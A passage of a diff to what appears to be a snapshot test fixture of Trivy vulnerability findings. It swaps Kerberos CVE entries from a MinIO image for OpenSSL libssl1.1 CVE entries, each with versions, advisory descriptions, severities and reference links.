"https://bugzilla.novell.com/show_bug.cgi?id=719047", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", + ], + }, + "category": "Vulnerability", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "references": [ { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13154861", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://hermes.opensuse.org/messages/13155432", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2011-3389.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-1263-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2011-3389", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "https://access.redhat.com/security/cve/CVE-2023-2650", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "https://ubuntu.com/security/notices/USN-6119-1", + "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230530.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"Issue summary: Processing some specially crafted ASN.1 object identifiers or +data containing them may be very slow. + +Impact summary: Applications that use OBJ_obj2txt() directly, or use any of +the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message +size limit may experience notable to very long delays when processing those +messages, which may lead to a Denial of Service. + +An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - +most of which have no size limit. OBJ_obj2txt() may be used to translate +an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL +type ASN1_OBJECT) to its canonical numeric text form, which are the +sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by +periods. + +When one of the sub-identifiers in the OBJECT IDENTIFIER is very large +(these are sizes that are seen as absurdly large, taking up tens or hundreds +of KiBs), the translation to a decimal number in text may take a very long +time. The time complexity is O(n^2) with 'n' being the size of the +sub-identifiers in bytes (*). + +With OpenSSL 3.0, support to fetch cryptographic algorithms using names / +identifiers in string form was introduced. This includes using OBJECT +IDENTIFIERs in canonical numeric text form as identifiers for fetching +algorithms. + +Such OBJECT IDENTIFIERs may be received through the ASN.1 structure +AlgorithmIdentifier, which is commonly used in multiple protocols to specify +what cryptographic algorithm should be used to sign or verify, encrypt or +decrypt, or digest passed data. + +Applications that call OBJ_obj2txt() directly with untrusted data are +affected, with any version of OpenSSL. If the use is for the mere purpose +of display, the severity is considered low. + +In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, +CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 +certificates, including simple things like verifying its signature. + +The impact on TLS is relatively low, because all versions of OpenSSL have a +100KiB limit on the peer's certificate chain. Additionally, this only +impacts clients, or servers that have explicitly enabled client +authentication. + +In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, +such as X.509 certificates. This is assumed to not happen in such a way +that it would cause a Denial of Service, so these versions are considered +not affected by this issue in such a way that it would be cause for concern, +and the severity is therefore considered low." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Possible DoS translating ASN.1 object identifiers", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://avd.aquasec.com/nvd/cve-2023-2650", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Invalid certificate policies in leaf certificates are silently ignored", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "Certificate policy check not enabled", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2007-6755", + "installedVersion": "1.1.1n-0+deb11u4", + "packageName": "libssl1.1", + "references": [ + "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "http://rump2007.cr.yp.to/15-shumow.pdf", + "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "http://www.securityfocus.com/bid/63657", + "https://access.redhat.com/security/cve/CVE-2007-6755", + "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + ], + }, + "category": "Vulnerability", + "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "Dual_EC_DRBG: weak pseudo random number generator", + "references": [ { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://avd.aquasec.com/nvd/cve-2007-6755", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "http://rump2007.cr.yp.to/15-shumow.pdf", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "http://www.securityfocus.com/bid/63657", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://access.redhat.com/security/cve/CVE-2007-6755", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", }, ], - "severity": "HIGH", + "severity": 